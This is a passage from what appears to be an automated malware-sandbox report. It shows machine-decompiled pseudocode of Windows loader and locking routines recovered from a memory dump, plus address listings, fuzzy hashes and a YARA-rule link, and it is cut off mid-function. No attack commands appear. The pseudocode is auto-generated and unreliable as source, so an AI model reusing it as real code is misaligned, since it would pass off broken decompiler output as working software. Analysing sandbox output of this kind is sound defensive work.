								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E02B34A2C(0x2be6e40, 0x2b34b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E02B17D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x2ad5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E02B2F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E02B2F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E02B77016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L02B12400(_t267 + 0x20);
															}
															L02B12400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E02B22397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E02B12280(_t134, 0x2be8608);
									__eflags =  *0x2be6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E02B0FFB0(_t198, _t241, 0x2be8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x2be6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x2be8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E02B26B90(_t210,  &_v64);
										_t262 =  *0x2be8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E02B2E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E02B397C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E02B3006A(0x2be8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x2be8608);
												E02B3B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x2be6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x2be6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E02B0FFB0(_t198, _t240, 0x2be8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E02B300C2(0x2be8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                        0x02b220a0
                        0x02b220a8
                        0x02b220ad
                        0x02b220b3
                        0x02b220b8
                        0x02b220c2
                        0x02b220c7
                        0x02b220cb
                        0x02b220d2
                        0x02b22263
                        0x02b22266
                        0x02b65836
                        0x02b65836
                        0x00000000
                        0x02b2226c
                        0x02b2226c
                        0x02b22270
                        0x02b22274
                        0x02b220e2
                        0x02b220e2
                        0x02b220e6
                        0x02b220ee
                        0x02b657dc
                        0x02b657de
                        0x02b657ec
                        0x02b657ec
                        0x02b657f1
                        0x02b657f3
                        0x02b657f8
                        0x00000000
                        0x02b657f8
                        0x02b657e0
                        0x02b657e4
                        0x02b657ea
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b657ea
                        0x02b220f4
                        0x02b220f4
                        0x02b220f8
                        0x02b220f8
                        0x02b220fc
                        0x02b22100
                        0x02b22106
                        0x02b22201
                        0x02b22206
                        0x02b2220b
                        0x02b2220e
                        0x02b222a9
                        0x02b222ac
                        0x00000000
                        0x00000000
                        0x02b222b2
                        0x02b222b5
                        0x02b65801
                        0x02b65806
                        0x00000000
                        0x00000000
                        0x02b65810
                        0x02b65815
                        0x02b65818
                        0x00000000
                        0x00000000
                        0x02b6581e
                        0x02b222bb
                        0x02b222bb
                        0x02b22218
                        0x02b22218
                        0x02b2221c
                        0x02b22220
                        0x02b22222
                        0x02b222c2
                        0x02b222c4
                        0x02b222dc
                        0x02b222dc
                        0x02b222e1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b222e7
                        0x02b222c8
                        0x02b222cd
                        0x02b222d3
                        0x02b222d6
                        0x02b65823
                        0x02b65825
                        0x02b65827
                        0x00000000
                        0x00000000
                        0x02b6582d
                        0x00000000
                        0x02b6582d
                        0x00000000
                        0x02b22228
                        0x02b22228
                        0x00000000
                        0x02b22228
                        0x02b22222
                        0x02b22214
                        0x02b22214
                        0x00000000
                        0x02b22114
                        0x02b22114
                        0x02b22114
                        0x02b2211a
                        0x02b2211c
                        0x02b22348
                        0x02b2234d
                        0x02b65840
                        0x02b65845
                        0x02b65848
                        0x02b6584e
                        0x02b6584e
                        0x02b65848
                        0x02b22353
                        0x02b22355
                        0x02b22388
                        0x02b22388
                        0x02b22368
                        0x02b2236a
                        0x02b2236c
                        0x02b2238f
                        0x00000000
                        0x02b2236e
                        0x02b2236e
                        0x02b2218e
                        0x02b2218e
                        0x02b22191
                        0x02b22195
                        0x02b65a03
                        0x02b65a06
                        0x02b65a0c
                        0x02b65a0f
                        0x02b65a11
                        0x02b65a13
                        0x02b65a13
                        0x02b65a19
                        0x02b65a1f
                        0x00000000
                        0x02b2219b
                        0x02b2219b
                        0x02b221a0
                        0x02b22282
                        0x02b22284
                        0x02b22284
                        0x02b22284
                        0x02b22284
                        0x02b221a6
                        0x02b221a9
                        0x02b221ac
                        0x02b221ae
                        0x02b221b3
                        0x02b2228b
                        0x02b22290
                        0x02b22379
                        0x02b22296
                        0x02b22298
                        0x02b22298
                        0x02b22290
                        0x02b221b9
                        0x02b221be
                        0x02b222a2
                        0x02b222a2
                        0x02b221c4
                        0x02b221c8
                        0x02b221cc
                        0x02b221d0
                        0x02b221d4
                        0x02b221de
                        0x02b221e3
                        0x02b65a29
                        0x02b65a2c
                        0x00000000
                        0x00000000
                        0x02b65a3b
                        0x00000000
                        0x02b221e9
                        0x02b221e9
                        0x02b221e9
                        0x02b221ee
                        0x02b221f1
                        0x02b65a45
                        0x02b65a4b
                        0x02b65a52
                        0x02b65a58
                        0x02b65a5d
                        0x02b65a5f
                        0x02b65a71
                        0x02b65a61
                        0x02b65a6a
                        0x02b65a6a
                        0x02b65a76
                        0x02b65a79
                        0x02b65a7f
                        0x02b65a83
                        0x02b65a85
                        0x02b65a87
                        0x02b65a87
                        0x02b65a8c
                        0x02b65a91
                        0x02b65a97
                        0x02b65a9f
                        0x02b65aa0
                        0x02b65aa1
                        0x02b65aa6
                        0x02b65aab
                        0x02b65ab1
                        0x02b65ab3
                        0x02b65ab9
                        0x02b65aca
                        0x02b65ad4
                        0x02b65ad4
                        0x02b65ade
                        0x02b65ade
                        0x02b65aab
                        0x02b65a79
                        0x02b65a52
                        0x02b221f7
                        0x02b221f9
                        0x02b221fe
                        0x02b221fe
                        0x02b221e3
                        0x02b22195
                        0x02b2236c
                        0x02b22122
                        0x02b22122
                        0x02b22124
                        0x02b22231
                        0x02b22236
                        0x02b22236
                        0x02b22238
                        0x02b22238
                        0x02b22240
                        0x02b22242
                        0x02b22244
                        0x02b659fc
                        0x02b2218c
                        0x02b2218c
                        0x00000000
                        0x02b2218c
                        0x02b2224a
                        0x02b2224f
                        0x02b22256
                        0x02b22304
                        0x02b22309
                        0x02b2230f
                        0x02b2231e
                        0x02b2231e
                        0x02b2231e
                        0x02b22320
                        0x02b22325
                        0x02b2232a
                        0x02b2232c
                        0x02b2233e
                        0x02b2233e
                        0x00000000
                        0x02b2232c
                        0x02b22311
                        0x02b22317
                        0x02b2231a
                        0x02b2231c
                        0x02b22380
                        0x02b22380
                        0x02b22380
                        0x02b22384
                        0x00000000
                        0x00000000
                        0x02b22386
                        0x00000000
                        0x02b2231c
                        0x02b2225c
                        0x02b2225c
                        0x00000000
                        0x02b2225c
                        0x02b2212a
                        0x02b22134
                        0x02b22138
                        0x02b2213d
                        0x02b65858
                        0x02b65863
                        0x02b65863
                        0x02b65867
                        0x02b6586a
                        0x00000000
                        0x00000000
                        0x02b6586c
                        0x02b6586c
                        0x02b65871
                        0x02b65875
                        0x02b65877
                        0x02b65997
                        0x02b6599c
                        0x02b659a1
                        0x02b659a7
                        0x02b659a7
                        0x00000000
                        0x02b659a7
                        0x02b6587d
                        0x00000000
                        0x02b6588b
                        0x02b6588b
                        0x02b65890
                        0x02b65892
                        0x02b65894
                        0x02b65899
                        0x02b6589b
                        0x02b658a0
                        0x02b658a0
                        0x02b658aa
                        0x02b658b2
                        0x02b658b6
                        0x02b658be
                        0x02b658c6
                        0x02b658c9
                        0x02b6590d
                        0x02b65917
                        0x02b6591a
                        0x02b6591c
                        0x02b65920
                        0x02b65928
                        0x02b6592a
                        0x02b6592c
                        0x02b6592e
                        0x02b6592e
                        0x02b658cb
                        0x02b658cd
                        0x02b658d8
                        0x02b658e0
                        0x02b658f4
                        0x02b658fe
                        0x02b658fe
                        0x02b6593a
                        0x02b6593e
                        0x02b65940
                        0x02b65942
                        0x00000000
                        0x02b65944
                        0x02b65944
                        0x02b65949
                        0x02b6594e
                        0x02b6594e
                        0x02b65953
                        0x02b6595b
                        0x02b65976
                        0x02b65976
                        0x02b6597a
                        0x02b6597f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b65981
                        0x02b65981
                        0x02b65981
                        0x02b65983
                        0x02b65988
                        0x02b6598d
                        0x02b65991
                        0x02b65991
                        0x00000000
                        0x02b6595d
                        0x02b6595d
                        0x02b65963
                        0x02b65965
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b65967
                        0x02b65967
                        0x02b6596b
                        0x02b6596d
                        0x00000000
                        0x00000000
                        0x02b6596f
                        0x02b65971
                        0x02b65971
                        0x02b65974
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b65974
                        0x00000000
                        0x02b65967
                        0x02b6595b
                        0x02b65942
                        0x02b65863
                        0x02b22143
                        0x02b22143
                        0x02b22149
                        0x02b2214f
                        0x02b222f1
                        0x02b222f6
                        0x00000000
                        0x02b22173
                        0x02b22173
                        0x02b2217d
                        0x02b22181
                        0x02b22186
                        0x02b659ae
                        0x02b659b2
                        0x02b659b5
                        0x02b659b7
                        0x02b659ba
                        0x02b659cd
                        0x02b659d1
                        0x02b659d5
                        0x02b659d9
                        0x02b659db
                        0x00000000
                        0x00000000
                        0x02b659dd
                        0x02b659dd
                        0x02b659e1
                        0x02b659e4
                        0x02b659e7
                        0x02b659ee
                        0x02b659ee
                        0x02b659f3
                        0x02b659f3
                        0x00000000
                        0x02b22186
                        0x02b2214f
                        0x02b22106
                        0x02b22266
                        0x02b220d8
                        0x02b220da
                        0x02b220e0
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0e1f1cfddb24320c85313179a87c4524e19708765c2b89f6f87f0835723192ee
                        • Instruction ID: d6abd85c55c6b23666e9446699182f1427024b7cda23896a89263bf144036a46
                        • Opcode Fuzzy Hash: 0e1f1cfddb24320c85313179a87c4524e19708765c2b89f6f87f0835723192ee
                        • Instruction Fuzzy Hash: FBF10471A083619FDB35CF28C444B6A77E2EF85314F04899DED99DB290D739D849CB82
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B0D5E0, Relevance: .4, Instructions: 353COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 87%
                        			E02B0D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x2bed360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E02B06600(0x2be52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x2be7b9c; // 0x0
							_t281 = L02B14620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E02B3F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x2be7b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x2be7b8c; // 0x603d80
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E02B12280(_t200, 0x2be84d8);
									_t277 =  *0x2be85f4; // 0x601f40
									_t351 =  *0x2be85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x601ed8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E02B0FFB0(_t287, _t353, 0x2be84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E02B4CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E02B06600(0x2be52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E02B07926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x2beb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E02B7E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x2be8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x2beb218; // 0x0
														asm("ror edi, cl");
														 *0x2beb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E02B12280(_t250, 0x2be84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L02B33898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E02B0FFB0(_t293, _t353, 0x2be84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E02B337F5(_t353, 0);
																}
																E02B30413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E02B29B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E02B202D6(_t174);
																}
																L02B177F0( *0x2be7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E02B2C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L02B0EC7F(_t353);
										L02B219B8(_t287, 0, _t353, 0);
										_t200 = E02AFF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E02B3B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x2beb2f8; // 0xad0000
									if((_t206 |  *0x2beb2fc) == 0 || ( *0x2beb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x2beb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E02BA6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E02BA6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E02B0E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L02B0EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E02B39730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
